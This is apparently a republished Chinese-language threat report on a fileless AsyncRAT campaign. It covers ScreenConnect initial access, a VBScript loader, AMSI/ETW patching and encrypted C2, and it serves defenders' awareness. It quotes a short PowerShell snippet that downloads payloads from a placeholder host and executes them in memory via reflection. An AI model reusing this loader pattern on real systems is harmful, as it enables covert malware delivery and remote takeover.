安全研究人员最近发现针对企业环境的复杂无文件恶意软件活动激增。
AsyncRAT 是一种强大的远程访问木马,它利用合法的系统工具完全在内存中执行恶意负载,有效地绕过了传统的基于磁盘的防御。
这一威胁的出现凸显了网络对手为保持受感染系统的隐秘性和持久性而采用的不断演变的策略。
大多数此类攻击的初始访问都是通过被入侵的远程支持软件实现的。入侵者利用未经授权的 ScreenConnect 部署,获得对受害设备的交互控制权。
一旦进入恶意软件内部,他们就会部署一个用 VBScript 编写的多阶段加载器。LevelBlue 分析师指出,该加载器会从攻击者控制的服务器检索两个编码的有效载荷——logs.ldk和。logs.ldr
这些有效载荷永远不会写入磁盘;相反,它们直接反映到内存中,在运行时将原始字节数组转换为可执行代码。
AsyncRAT 的架构围绕模块化 .NET 程序集展开,旨在实现逃避和核心 RAT 功能。
LevelBlue 研究人员在第一阶段 DLL 中发现了三个主要类:入口点初始化程序、创建伪装成合法更新程序的计划任务的持久性管理器,以及修补 AMSI 和 ETW 挂钩以禁用 Windows 安全日志记录的反分析组件。
通过动态 API 解析和内存加载,该恶意软件最大限度地提高了隐蔽性并使取证分析变得复杂。
除了混淆之外,AsyncRAT 的第二阶段AsyncClient.exe——充当命令和控制引擎。
二进制文件中的加密配置数据指定了 C2 域、端口、感染标志和目标目录。
使用 AES-256 解密后,客户端与其控制服务器建立 TCP 套接字,交换带有长度前缀的 MessagePack 数据包。
该协议支持侦察命令、数据泄露例程以及攻击者提供的指令的远程执行。
感染机制
AsyncRAT 的感染机制始于执行一个简单的 VBScript,Update.vbs通过 启动WScript.exe。
该脚本使用以下 PowerShell 代码片段来获取并执行加载程序:
$urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
foreach ($u in $urls) {
$bytes = (New-Object Net.WebClient).DownloadData($u)
[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
}这个简洁的加载器执行两个关键功能:它解密下载的二进制文件并完全在内存中调用它们的入口点,不会在磁盘上留下任何取证痕迹。
通过将基于反射的加载与 Obfuscator.dll 中的反分析例程链接起来,攻击者可以确保每个阶段都对端点检测工具保持隐藏。
后续控制权交给 AsyncClient.exe,它可以保持持久性并实现主机的完全远程管理。
通过这种无文件方法,AsyncRAT展示了现代恶意软件如何将合法脚本平台与先进的规避策略相结合,以无缝地破坏和控制目标系统。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
